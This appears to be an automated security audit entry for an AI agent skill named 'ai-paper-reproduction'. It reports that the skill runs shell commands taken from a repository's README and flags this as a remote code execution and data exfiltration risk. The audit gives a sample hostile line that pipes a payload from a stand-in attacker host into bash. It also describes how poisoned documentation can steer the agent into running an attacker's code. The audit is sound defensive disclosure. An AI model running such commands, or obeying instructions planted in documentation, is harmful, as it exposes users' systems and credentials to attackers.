ai-paper-reproduction
Fail
Audited by Gen Agent Trust Hub on Mar 30, 2026
Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTION
Full Analysis
- [COMMAND_EXECUTION]: The script
scripts/orchestrate_repro.pycontains logic to execute shell commands extracted from the target repository's documentation. - Specifically, the
maybe_run_commandfunction callssubprocess.run()on acommandstring that originates from the repository'sREADME.mdfile. - The
choose_goalfunction identifies "runnable" commands from the repository and passes them to the execution logic, which can result in the execution of arbitrary shell strings. - [REMOTE_CODE_EXECUTION]: Since the execution targets are sourced from external and potentially untrusted code repositories, this creates a direct vector for remote code execution.
- An attacker can place malicious shell commands inside a
README.mdfile (e.g.,curl http://attacker.com/payload | bash) in a repository. - The skill's primary policy of "README-first" reproduction encourages the agent to prioritize and execute these documented commands, leading to the execution of attacker-controlled code on the user's system.
- [DATA_EXFILTRATION]: The ability to execute arbitrary commands provides a mechanism for accessing and exfiltrating sensitive local data (such as environment variables, SSH keys, or AWS credentials) to external servers controlled by an attacker who has manipulated the repository's documentation.
Recommendations
- AI detected serious security threats
Audit Metadata